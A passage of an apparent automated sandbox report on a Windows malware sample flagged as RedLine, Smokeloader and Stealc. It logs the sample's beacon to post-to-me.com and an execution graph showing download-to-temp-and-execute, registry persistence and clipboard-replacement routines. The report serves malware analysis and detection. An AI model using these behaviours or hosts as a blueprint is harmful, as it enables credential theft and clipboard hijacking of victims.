                                                    Server: Apache/2.4.58 (Ubuntu)
                                                    Content-Length: 8
                                                    Keep-Alive: timeout=5, max=99
                                                    Connection: Keep-Alive
                                                    Content-Type: text/html; charset=UTF-8
                                                    Data Raw: 59 6d 78 76 59 32 73 3d
                                                    Data Ascii: YmxvY2s=


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.749699104.21.56.704433076C:\Users\user\Desktop\ief722WreR.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-10 16:42:07 UTC90OUTGET /track_prt.php?sub=0&cc=DE HTTP/1.1
                                                    User-Agent: ShareScreen
                                                    Host: post-to-me.com
                                                    2024-12-10 16:42:07 UTC799INHTTP/1.1 200 OK
                                                    Date: Tue, 10 Dec 2024 16:42:07 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tlYE1Qug7JTLNcVlIBqwHyvhykKgsbbrN3sQOyRte7IqPWazRcO18DhZ3RxKPo%2FumXeXynQpljSrOIp9jkG%2B3CGtqOjNLlhj0Btw47s0KWU5p%2BeYAa0oCb8VAbjxW5OqPA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8efeafb2f8b44387-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1601&min_rtt=1598&rtt_var=607&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=728&delivery_rate=1792510&cwnd=47&unsent_bytes=0&cid=5de7fe60112d980f&ts=734&x=0"
                                                    2024-12-10 16:42:07 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                    Data Ascii: 2ok
                                                    2024-12-10 16:42:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Click to jump to process

                                                    Click to jump to process

                                                    Click to dive into process behavior distribution

                                                    Click to jump to process

                                                    Target ID:0
                                                    Start time:11:42:02
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\Desktop\ief722WreR.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\ief722WreR.exe"
                                                    Imagebase:0x400000
                                                    File size:429'568 bytes
                                                    MD5 hash:0B9795BC5978C62899793B157271E979
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.3676143282.0000000000AF9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                    Reputation:low
                                                    Has exited:false

                                                    Target ID:8
                                                    Start time:11:42:09
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\Temp\DADE.tmp.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user~1\AppData\Local\Temp\DADE.tmp.exe"
                                                    Imagebase:0x400000
                                                    File size:303'104 bytes
                                                    MD5 hash:017E73F6839555AA663A62235A81B433
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000008.00000002.1934099181.0000000000A58000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000008.00000003.1314965093.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000008.00000002.1934122632.0000000000A77000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    Antivirus matches:
                                                    • Detection: 100%, Joe Sandbox ML
                                                    • Detection: 47%, ReversingLabs
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:13
                                                    Start time:13:18:29
                                                    Start date:10/12/2024
                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 564 -s 1096
                                                    Imagebase:0x460000
                                                    File size:483'680 bytes
                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:2.3%
                                                      Dynamic/Decrypted Code Coverage:4.4%
                                                      Signature Coverage:6.7%
                                                      Total number of Nodes:639
                                                      Total number of Limit Nodes:20
                                                      execution_graph 64968 af94ee 64969 af94fd 64968->64969 64972 af9c8e 64969->64972 64977 af9ca9 64972->64977 64973 af9cb2 CreateToolhelp32Snapshot 64974 af9cce Module32First 64973->64974 64973->64977 64975 af9cdd 64974->64975 64978 af9506 64974->64978 64979 af994d 64975->64979 64977->64973 64977->64974 64980 af9978 64979->64980 64981 af9989 VirtualAlloc 64980->64981 64982 af99c1 64980->64982 64981->64982 64982->64982 64983 402c04 InternetOpenW 64984 402e55 64983->64984 64987 402c37 Concurrency::details::ReferenceCountedQuickBitSet::Grow 64983->64987 65004 40f8cf 64984->65004 64986 402e64 64995 42defd 64987->64995 64990 42defd std::_Locinfo::_Locinfo_ctor 26 API calls 64991 402e17 64990->64991 64992 42defd std::_Locinfo::_Locinfo_ctor 26 API calls 64991->64992 64993 402e29 InternetOpenUrlW 64992->64993 64993->64984 64994 402e44 InternetCloseHandle InternetCloseHandle 64993->64994 64994->64984 64996 42df1a 64995->64996 64998 42df0c 64995->64998 65011 42eac9 20 API calls __dosmaperr 64996->65011 64998->64996 65001 42df4a 64998->65001 65000 402e09 65000->64990 65001->65000 65013 42eac9 20 API calls __dosmaperr 65001->65013 65003 42df24 65012 42a59d 26 API calls _Deallocate 65003->65012 65005 40f8d8 65004->65005 65006 40f8da IsProcessorFeaturePresent 65004->65006 65005->64986 65008 40f94d 65006->65008 65014 40f911 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 65008->65014 65010 40fa30 65010->64986 65011->65003 65012->65000 65013->65003 65014->65010 65015 248003c 65016 2480049 65015->65016 65030 2480e0f SetErrorMode SetErrorMode 65016->65030 65021 2480265 65022 24802ce VirtualProtect 65021->65022 65024 248030b 65022->65024 65023 2480439 VirtualFree 65028 24804be 65023->65028 65029 24805f4 LoadLibraryA 65023->65029 65024->65023 65025 24804e3 LoadLibraryA 65025->65028 65027 24808c7 65028->65025 65028->65029 65029->65027 65031 2480223 65030->65031 65032 2480d90 65031->65032 65033 2480dad 65032->65033 65034 2480dbb GetPEB 65033->65034 65035 2480238 VirtualAlloc 65033->65035 65034->65035 65035->65021 65036 40fc06 65037 40fc12 ___BuildCatchObject 65036->65037 65065 40fff3 65037->65065 65039 40fc19 65040 40fd6c 65039->65040 65043 40fc43 65039->65043 65086 4104d3 4 API calls 2 library calls 65040->65086 65042 40fd73 65087 42ffc9 28 API calls _Atexit 65042->65087 65053 40fc82 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 65043->65053 65080 42fcee 5 API calls __ehhandler$?_Init@?$_Mpunct@_W@std@@IAEXABV_Locinfo@2@@Z 65043->65080 65045 40fd79 65088 42ff7b 28 API calls _Atexit 65045->65088 65048 40fc5c 65050 40fc62 65048->65050 65081 42fc92 5 API calls __ehhandler$?_Init@?$_Mpunct@_W@std@@IAEXABV_Locinfo@2@@Z 65048->65081 65049 40fd81 65056 40fce3 65053->65056 65082 42a366 167 API calls 4 library calls 65053->65082 65054 40fce9 65057 40fcfe 65054->65057 65076 4105ed 65056->65076 65083 410623 GetModuleHandleW 65057->65083 65059 40fd05 65059->65042 65060 40fd09 65059->65060 65061 40fd12 65060->65061 65084 42ff6c 28 API calls _Atexit 65060->65084 65085 410182 13 API calls 2 library calls 65061->65085 65064 40fd1a 65064->65050 65066 40fffc 65065->65066 65089 41077b IsProcessorFeaturePresent 65066->65089 65068 410008 65090 428827 10 API calls 3 library calls 65068->65090 65070 41000d 65075 410011 65070->65075 65091 4317a1 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 65070->65091 65072 41001a 65073 410028 65072->65073 65092 428850 8 API calls 3 library calls 65072->65092 65073->65039 65075->65039 65093 426830 65076->65093 65079 410613 65079->65054 65080->65048 65081->65053 65082->65056 65083->65059 65084->65061 65085->65064 65086->65042 65087->65045 65088->65049 65089->65068 65090->65070 65091->65072 65092->65075 65094 410600 GetStartupInfoW 65093->65094 65094->65079 65095 432785 65100 432553 65095->65100 65098 4327ad 65105 43257e 65100->65105 65102 432771 65119 42a59d 26 API calls _Deallocate 65102->65119 65104 4326d0 65104->65098 65112 43d01c 65104->65112 65105->65105 65111 4326c7 65105->65111 65115 43c8ce 170 API calls 2 library calls 65105->65115 65107 432711 65107->65111 65116 43c8ce 170 API calls 2 library calls 65107->65116 65109 432730 65109->65111 65117 43c8ce 170 API calls 2 library calls 65109->65117 65111->65104 65118 42eac9 20 API calls __dosmaperr 65111->65118 65120 43c9f1 65112->65120 65114 43d037 65114->65098 65115->65107 65116->65109 65117->65111 65118->65102 65119->65104 65122 43c9fd ___BuildCatchObject 65120->65122 65121 43ca0b 65138 42eac9 20 API calls __dosmaperr 65121->65138 65122->65121 65124 43ca44 65122->65124 65131 43cfcb 65124->65131 65125 43ca10 65139 42a59d 26 API calls _Deallocate 65125->65139 65130 43ca1a __wsopen_s 65130->65114 65141 43f941 65131->65141 65134 43ca68 65140 43ca91 LeaveCriticalSection __wsopen_s 65134->65140 65138->65125 65139->65130 65140->65130 65142 43f964 65141->65142 65143 43f94d 65141->65143 65144 43f983 65142->65144 65145 43f96c 65142->65145 65218 42eac9 20 API calls __dosmaperr 65143->65218 65222 434faa 10 API calls 2 library calls 65144->65222 65220 42eac9 20 API calls __dosmaperr 65145->65220 65149 43f952 65219 42a59d 26 API calls _Deallocate 65149->65219 65150 43f971 65221 42a59d 26 API calls _Deallocate 65150->65221 65151 43f98a MultiByteToWideChar 65154 43f9b9 65151->65154 65155 43f9a9 GetLastError 65151->65155 65224 4336a7 21 API calls 3 library calls 65154->65224 65223 42ea93 20 API calls 2 library calls 65155->65223 65158 43cfe1 65158->65134 65165 43d03c 65158->65165 65159 43f9c1 65160 43f9e9 65159->65160 65161 43f9c8 MultiByteToWideChar 65159->65161 65162 43346a _free 20 API calls 65160->65162 65161->65160 65163 43f9dd GetLastError 65161->65163 65162->65158 65225 42ea93 20 API calls 2 library calls 65163->65225 65226 43cd9f 65165->65226 65168 43d087 65244 43977e 65168->65244 65169 43d06e 65258 42eab6 20 API calls __dosmaperr 65169->65258 65172 43d073 65259 42eac9 20 API calls __dosmaperr 65172->65259 65173 43d08c 65174 43d095 65173->65174 65175 43d0ac 65173->65175 65260 42eab6 20 API calls __dosmaperr 65174->65260 65257 43cd0a CreateFileW 65175->65257 65179 43d09a 65261 42eac9 20 API calls __dosmaperr 65179->65261 65180 43d162 GetFileType 65183 43d1b4 65180->65183 65184 43d16d GetLastError 65180->65184 65182 43d137 GetLastError 65263 42ea93 20 API calls 2 library calls 65182->65263 65266 4396c7 21 API calls 3 library calls 65183->65266 65264 42ea93 20 API calls 2 library calls 65184->65264 65185 43d0e5 65185->65180 65185->65182 65262 43cd0a CreateFileW 65185->65262 65189 43d17b CloseHandle 65189->65172 65192 43d1a4 65189->65192 65191 43d12a 65191->65180 65191->65182 65265 42eac9 20 API calls __dosmaperr 65192->65265 65193 43d1d5 65195 43d221 65193->65195 65267 43cf1b 169 API calls 4 library calls 65193->65267 65200 43d24e 65195->65200 65268 43cabd 167 API calls 4 library calls 65195->65268 65196 43d1a9 65196->65172 65199 43d247 65199->65200 65201 43d25f 65199->65201 65269 4335cd 29 API calls 2 library calls 65200->65269 65203 43d009 65201->65203 65204 43d2dd CloseHandle 65201->65204 65212 43346a 65203->65212 65270 43cd0a CreateFileW 65204->65270 65206 43d308 65207 43d312 GetLastError 65206->65207 65208 43d257 65206->65208 65271 42ea93 20 API calls 2 library calls 65207->65271 65208->65203 65210 43d31e 65272 439890 21 API calls 3 library calls 65210->65272 65213 433475 RtlFreeHeap 65212->65213 65217 43349e __dosmaperr 65212->65217 65214 43348a 65213->65214 65213->65217 65295 42eac9 20 API calls __dosmaperr 65214->65295 65216 433490 GetLastError 65216->65217 65217->65134 65218->65149 65219->65158 65220->65150 65221->65158 65222->65151 65223->65158 65224->65159 65225->65160 65227 43cdc0 65226->65227 65228 43cdda 65226->65228 65227->65228 65280 42eac9 20 API calls __dosmaperr 65227->65280 65273 43cd2f 65228->65273 65231 43cdcf 65281 42a59d 26 API calls _Deallocate 65231->65281 65233 43ce12 65234 43ce41 65233->65234 65282 42eac9 20 API calls __dosmaperr 65233->65282 65241 43ce94 65234->65241 65284 42ffdf 26 API calls 2 library calls 65234->65284 65237 43ce8f 65239 43cf0e 65237->65239 65237->65241 65238 43ce36 65283 42a59d 26 API calls _Deallocate 65238->65283 65285 42a5ca 11 API calls _Atexit 65239->65285 65241->65168 65241->65169 65243 43cf1a 65245 43978a ___BuildCatchObject 65244->65245 65288 42e3ed EnterCriticalSection 65245->65288 65247 4397b6 65292 43955d 21 API calls 3 library calls 65247->65292 65248 439791 65248->65247 65253 439824 EnterCriticalSection 65248->65253 65256 4397d8 65248->65256 65251 439801 __wsopen_s 65251->65173 65252 4397bb 65252->65256 65293 4396a4 EnterCriticalSection 65252->65293 65254 439831 LeaveCriticalSection 65253->65254 65253->65256 65254->65248 65289 439887 65256->65289 65257->65185 65258->65172 65259->65203 65260->65179 65261->65172 65262->65191 65263->65172 65264->65189 65265->65196 65266->65193 65267->65195 65268->65199 65269->65208 65270->65206 65271->65210 65272->65208 65275 43cd47 65273->65275 65274 43cd62 65274->65233 65275->65274 65286 42eac9 20 API calls __dosmaperr 65275->65286 65277 43cd86 65287 42a59d 26 API calls _Deallocate 65277->65287 65279 43cd91 65279->65233 65280->65231 65281->65228 65282->65238 65283->65234 65284->65237 65285->65243 65286->65277 65287->65279 65288->65248 65294 42e435 LeaveCriticalSection 65289->65294 65291 43988e 65291->65251 65292->65252 65293->65256 65294->65291 65295->65216 65296 43410a 65297 434116 ___BuildCatchObject 65296->65297 65298 434122 65297->65298 65299 434139 65297->65299 65330 42eac9 20 API calls __dosmaperr 65298->65330 65309 42caff EnterCriticalSection 65299->65309 65302 434127 65331 42a59d 26 API calls _Deallocate 65302->65331 65303 434149 65310 434186 65303->65310 65306 434155 65332 43417c LeaveCriticalSection __fread_nolock 65306->65332 65308 434132 __wsopen_s 65309->65303 65311 434194 65310->65311 65312 4341ae 65310->65312 65343 42eac9 20 API calls __dosmaperr 65311->65343 65333 432908 65312->65333 65315 434199 65344 42a59d 26 API calls _Deallocate 65315->65344 65316 4341b7 65340 4347d3 65316->65340 65320 4342bb 65322 4342c8 65320->65322 65329 43426e 65320->65329 65321 43423f 65323 43425c 65321->65323 65321->65329 65346 42eac9 20 API calls __dosmaperr 65322->65346 65345 43449f 31 API calls 4 library calls 65323->65345 65326 434266 65328 4341a4 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 65326->65328 65328->65306 65329->65328 65347 43431b 30 API calls 2 library calls 65329->65347 65330->65302 65331->65308 65332->65308 65334 432914 65333->65334 65335 432929 65333->65335 65348 42eac9 20 API calls __dosmaperr 65334->65348 65335->65316 65337 432919 65349 42a59d 26 API calls _Deallocate 65337->65349 65339 432924 65339->65316 65350 434650 65340->65350 65342 4341d3 65342->65320 65342->65321 65342->65328 65343->65315 65344->65328 65345->65326 65346->65328 65347->65328 65348->65337 65349->65339 65351 43465c ___BuildCatchObject 65350->65351 65352 434664 65351->65352 65353 43467c 65351->65353 65385 42eab6 20 API calls __dosmaperr 65352->65385 65355 434730 65353->65355 65360 4346b4 65353->65360 65390 42eab6 20 API calls __dosmaperr 65355->65390 65356 434669 65386 42eac9 20 API calls __dosmaperr 65356->65386 65359 434735 65391 42eac9 20 API calls __dosmaperr 65359->65391 65375 4396a4 EnterCriticalSection 65360->65375 65363 43473d 65392 42a59d 26 API calls _Deallocate 65363->65392 65364 4346ba 65366 4346f3 65364->65366 65367 4346de 65364->65367 65376 434755 65366->65376 65387 42eac9 20 API calls __dosmaperr 65367->65387 65370 4346e3 65388 42eab6 20 API calls __dosmaperr 65370->65388 65371 434671 __wsopen_s 65371->65342 65372 4346ee 65389 434728 LeaveCriticalSection __wsopen_s 65372->65389 65375->65364 65393 439921 65376->65393 65378 434767 65379 434780 SetFilePointerEx 65378->65379 65380 43476f 65378->65380 65381 434774 65379->65381 65382 434798 GetLastError 65379->65382 65406 42eac9 20 API calls __dosmaperr 65380->65406 65381->65372 65407 42ea93 20 API calls 2 library calls 65382->65407 65385->65356 65386->65371 65387->65370 65388->65372 65389->65371 65390->65359 65391->65363 65392->65371 65394 43992e 65393->65394 65396 439943 65393->65396 65408 42eab6 20 API calls __dosmaperr 65394->65408 65401 439968 65396->65401 65410 42eab6 20 API calls __dosmaperr 65396->65410 65398 439933 65409 42eac9 20 API calls __dosmaperr 65398->65409 65399 439973 65411 42eac9 20 API calls __dosmaperr 65399->65411 65401->65378 65403 43993b 65403->65378 65404 43997b 65412 42a59d 26 API calls _Deallocate 65404->65412 65406->65381 65407->65381 65408->65398 65409->65403 65410->65399 65411->65404 65412->65403 65413 402bad RegCreateKeyExW 65414 402bdb RegSetValueExW 65413->65414 65415 402bef 65413->65415 65414->65415 65416 402bf4 RegCloseKey 65415->65416 65417 402bfd 65415->65417 65416->65417 65418 404b8e 65419 404b9a Concurrency::details::ResourceManager::DynamicResourceManager 65418->65419 65424 40fb0c 65419->65424 65423 404bba ~ListArray Concurrency::details::ResourceManager::DynamicResourceManager 65426 40fb11 65424->65426 65427 404ba3 65426->65427 65429 40fb2d Mailbox 65426->65429 65448 42ad7e 65426->65448 65455 42f450 7 API calls 2 library calls 65426->65455 65432 4051d0 65427->65432 65456 42860d RaiseException 65429->65456 65431 4103cc 65433 4051dc __Cnd_init Concurrency::details::ResourceManager::DynamicResourceManager 65432->65433 65435 4051f4 __Mtx_init 65433->65435 65467 40ce32 28 API calls std::_Throw_Cpp_error 65433->65467 65438 40521b 65435->65438 65468 40ce32 28 API calls std::_Throw_Cpp_error 65435->65468 65459 4010ea 65438->65459 65442 40526a 65444 40527f ~ListArray 65442->65444 65470 401128 30 API calls 2 library calls 65442->65470 65471 401109 65444->65471 65447 4052a4 Concurrency::details::ResourceManager::DynamicResourceManager 65447->65423 65453 4336a7 std::_Locinfo::_Locinfo_ctor 65448->65453 65449 4336e5 65458 42eac9 20 API calls __dosmaperr 65449->65458 65451 4336d0 RtlAllocateHeap 65452 4336e3 65451->65452 65451->65453 65452->65426 65453->65449 65453->65451 65457 42f450 7 API calls 2 library calls 65453->65457 65455->65426 65456->65431 65457->65453 65458->65452 65475 40d313 65459->65475 65462 401103 65464 40cef3 65462->65464 65499 42e114 65464->65499 65467->65435 65468->65438 65469 40ce32 28 API calls std::_Throw_Cpp_error 65469->65442 65470->65442 65472 401115 __Mtx_unlock 65471->65472 65474 401122 65472->65474 65827 40ce32 28 API calls std::_Throw_Cpp_error 65472->65827 65474->65447 65479 40d06d 65475->65479 65478 40ce32 28 API calls std::_Throw_Cpp_error 65478->65462 65480 40d0c3 65479->65480 65481 40d095 GetCurrentThreadId 65479->65481 65483 40d0c7 GetCurrentThreadId 65480->65483 65487 40d0ed 65480->65487 65482 40d0a0 GetCurrentThreadId 65481->65482 65486 40d0bb 65481->65486 65482->65486 65492 40d0d6 65483->65492 65484 40d186 GetCurrentThreadId 65484->65492 65485 40d1dd GetCurrentThreadId 65485->65486 65489 40f8cf __ehhandler$?_Init@?$_Mpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 65486->65489 65487->65484 65488 40d10d 65487->65488 65497 40e92f GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 65488->65497 65493 4010f6 65489->65493 65492->65485 65492->65486 65493->65462 65493->65478 65494 40d145 GetCurrentThreadId 65494->65492 65495 40d118 __Xtime_diff_to_millis2 65494->65495 65495->65486 65495->65492 65495->65494 65498 40e92f GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 65495->65498 65497->65495 65498->65495 65500 42e121 65499->65500 65501 42e135 65499->65501 65522 42eac9 20 API calls __dosmaperr 65500->65522 65513 42e0cb 65501->65513 65504 42e126 65523 42a59d 26 API calls _Deallocate 65504->65523 65507 42e14a CreateThread 65509 42e175 65507->65509 65510 42e169 GetLastError 65507->65510 65544 42dfc0 65507->65544 65508 405257 65508->65442 65508->65469 65525 42e03d 65509->65525 65524 42ea93 20 API calls 2 library calls 65510->65524 65533 434d2a 65513->65533 65516 43346a _free 20 API calls 65517 42e0e4 65516->65517 65518 42e103 65517->65518 65519 42e0eb GetModuleHandleExW 65517->65519 65520 42e03d __Thrd_start 22 API calls 65518->65520 65519->65518 65521 42e10d 65520->65521 65521->65507 65521->65509 65522->65504 65523->65508 65524->65509 65526 42e04a 65525->65526 65532 42e06e 65525->65532 65527 42e050 CloseHandle 65526->65527 65528 42e059 65526->65528 65527->65528 65529 42e068 65528->65529 65530 42e05f FreeLibrary 65528->65530 65531 43346a _free 20 API calls 65529->65531 65530->65529 65531->65532 65532->65508 65534 434d37 65533->65534 65535 434d77 65534->65535 65536 434d62 HeapAlloc 65534->65536 65539 434d4b std::_Locinfo::_Locinfo_ctor 65534->65539 65543 42eac9 20 API calls __dosmaperr 65535->65543 65537 434d75 65536->65537 65536->65539 65540 42e0db 65537->65540 65539->65535 65539->65536 65542 42f450 7 API calls 2 library calls 65539->65542 65540->65516 65542->65539 65543->65540 65545 42dfcc _Atexit 65544->65545 65546 42dfd3 GetLastError ExitThread 65545->65546 65547 42dfe0 65545->65547 65560 431eda GetLastError 65547->65560 65549 42dfe5 65580 435571 65549->65580 65553 42dffb 65587 401169 65553->65587 65561 431ef0 65560->65561 65562 431ef6 65560->65562 65595 435111 11 API calls 2 library calls 65561->65595 65564 434d2a __Thrd_start 20 API calls 65562->65564 65566 431f45 SetLastError 65562->65566 65565 431f08 65564->65565 65567 431f10 65565->65567 65596 435167 11 API calls 2 library calls 65565->65596 65566->65549 65569 43346a _free 20 API calls 65567->65569 65571 431f16 65569->65571 65570 431f25 65570->65567 65572 431f2c 65570->65572 65573 431f51 SetLastError 65571->65573 65597 431d4c 20 API calls __dosmaperr 65572->65597 65598 42df7d 167 API calls 2 library calls 65573->65598 65575 431f37 65577 43346a _free 20 API calls 65575->65577 65579 431f3e 65577->65579 65578 431f5d 65579->65566 65579->65573 65581 435596 65580->65581 65582 43558c 65580->65582 65599 434e93 5 API calls 2 library calls 65581->65599 65584 40f8cf __ehhandler$?_Init@?$_Mpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 65582->65584 65585 42dff0 65584->65585 65585->65553 65594 4354a4 10 API calls 2 library calls 65585->65594 65586 4355ad 65586->65582 65600 405800 65587->65600 65613 40155a Sleep 65587->65613 65588 401173 65591 42e199 65588->65591 65795 42e074 65591->65795 65593 42e1a6 65594->65553 65595->65562 65596->65570 65597->65575 65598->65578 65599->65586 65601 40580c Concurrency::details::ResourceManager::DynamicResourceManager 65600->65601 65602 4010ea std::_Cnd_initX 35 API calls 65601->65602 65603 405821 __Cnd_signal 65602->65603 65604 405839 65603->65604 65659 40ce32 28 API calls std::_Throw_Cpp_error 65603->65659 65606 401109 std::_Cnd_initX 28 API calls 65604->65606 65607 405842 65606->65607 65615 4029f4 InternetOpenW 65607->65615 65631 4016df 65607->65631 65610 405849 ~ListArray Concurrency::details::ResourceManager::DynamicResourceManager 65610->65588 65614 4016d5 65613->65614 65616 402a27 InternetOpenUrlW 65615->65616 65617 402b9c 65615->65617 65616->65617 65618 402a3d GetTempPathW GetTempFileNameW 65616->65618 65620 40f8cf __ehhandler$?_Init@?$_Mpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 65617->65620 65660 42a88e 65618->65660 65621 402bab 65620->65621 65652 40e76b 65621->65652 65623 402b8b InternetCloseHandle InternetCloseHandle 65623->65617 65624 402aa8 Concurrency::details::ReferenceCountedQuickBitSet::Grow 65625 402ac0 InternetReadFile WriteFile 65624->65625 65626 402b00 CloseHandle 65624->65626 65625->65624 65662 402960 65626->65662 65629 402b2b ShellExecuteExW 65629->65623 65630 402b72 WaitForSingleObject CloseHandle 65629->65630 65630->65623 65773 40fde6 65631->65773 65633 4016eb Sleep 65774 40cc10 65633->65774 65636 40cc10 28 API calls 65637 401711 65636->65637 65638 40171b OpenClipboard 65637->65638 65639 401943 Sleep 65638->65639 65640 40172b GetClipboardData 65638->65640 65639->65638 65641 40173b GlobalLock 65640->65641 65642 40193d CloseClipboard 65640->65642 65641->65642 65646 401748 _strlen 65641->65646 65642->65639 65643 40cbc7 28 API calls std::system_error::system_error 65643->65646 65644 40cc10 28 API calls 65644->65646 65646->65642 65646->65643 65646->65644 65647 4018d2 EmptyClipboard GlobalAlloc 65646->65647 65778 402e66 167 API calls 2 library calls 65646->65778 65780 40caa6 26 API calls _Deallocate 65646->65780 65647->65646 65649 4018eb GlobalLock 65647->65649 65779 426990 65649->65779 65651 401905 GlobalUnlock SetClipboardData GlobalFree 65651->65646 65786 40deea 65652->65786 65657 40e782 __Cnd_do_broadcast_at_thread_exit __Mtx_unlock __Cnd_broadcast 65793 40def6 LeaveCriticalSection std::_Lockit::~_Lockit 65657->65793 65658 40e810 65658->65610 65659->65604 65661 402a76 CreateFileW 65660->65661 65661->65623 65661->65624 65663 40298b _wcslen Concurrency::details::ReferenceCountedQuickBitSet::Grow 65662->65663 65672 42b454 65663->65672 65667 4029b8 65694 404333 65667->65694 65670 40f8cf __ehhandler$?_Init@?$_Mpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 65671 4029f2 65670->65671 65671->65623 65671->65629 65698 42b106 65672->65698 65675 402823 65676 402832 Concurrency::details::ResourceManager::DynamicResourceManager 65675->65676 65724 4032dd 65676->65724 65678 402846 65740 403b8b 65678->65740 65680 40285a 65681 402888 65680->65681 65682 40286c 65680->65682 65746 403112 65681->65746 65767 40329a 167 API calls 65682->65767 65685 402895 65749 403c20 65685->65749 65687 4028a7 65759 403cc2 65687->65759 65688 40287f std::ios_base::_Ios_base_dtor Concurrency::details::ResourceManager::DynamicResourceManager 65688->65667 65690 4028c4 65691 404333 26 API calls 65690->65691 65692 4028e3 65691->65692 65768 40329a 167 API calls 65692->65768 65695 4029e4 65694->65695 65696 40433b 65694->65696 65695->65670 65769 40cc96 65696->65769 65699 42b133 65698->65699 65700 42b137 65699->65700 65701 42b142 65699->65701 65702 42b15a 65699->65702 65705 40f8cf __ehhandler$?_Init@?$_Mpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 65700->65705 65703 42eac9 __Wcrtomb 20 API calls 65701->65703 65704 42a747 __fassign 162 API calls 65702->65704 65706 42b147 65703->65706 65707 42b165 65704->65707 65708 4029a4 65705->65708 65709 42a59d __wsopen_s 26 API calls 65706->65709 65710 42b170 65707->65710 65711 42b307 65707->65711 65708->65675 65709->65700 65713 42b218 WideCharToMultiByte 65710->65713 65718 42b17b 65710->65718 65721 42b1b5 WideCharToMultiByte 65710->65721 65712 42b334 WideCharToMultiByte 65711->65712 65714 42b312 65711->65714 65712->65714 65715 42b243 65713->65715 65713->65718 65714->65700 65716 42eac9 __Wcrtomb 20 API calls 65714->65716 65715->65718 65719 42b24c GetLastError 65715->65719 65716->65700 65718->65700 65720 42eac9 __Wcrtomb 20 API calls 65718->65720 65719->65718 65723 42b25b 65719->65723 65720->65700 65721->65718 65722 42b274 WideCharToMultiByte 65722->65714 65722->65723 65723->65700 65723->65714 65723->65722 65725 4032e9 Concurrency::details::ResourceManager::DynamicResourceManager 65724->65725 65726 40467c 167 API calls 65725->65726 65727 403315 65726->65727 65728 40484d 167 API calls 65727->65728 65729 40333e 65728->65729 65730 40458c 26 API calls 65729->65730 65731 40334d 65730->65731 65732 40dde3 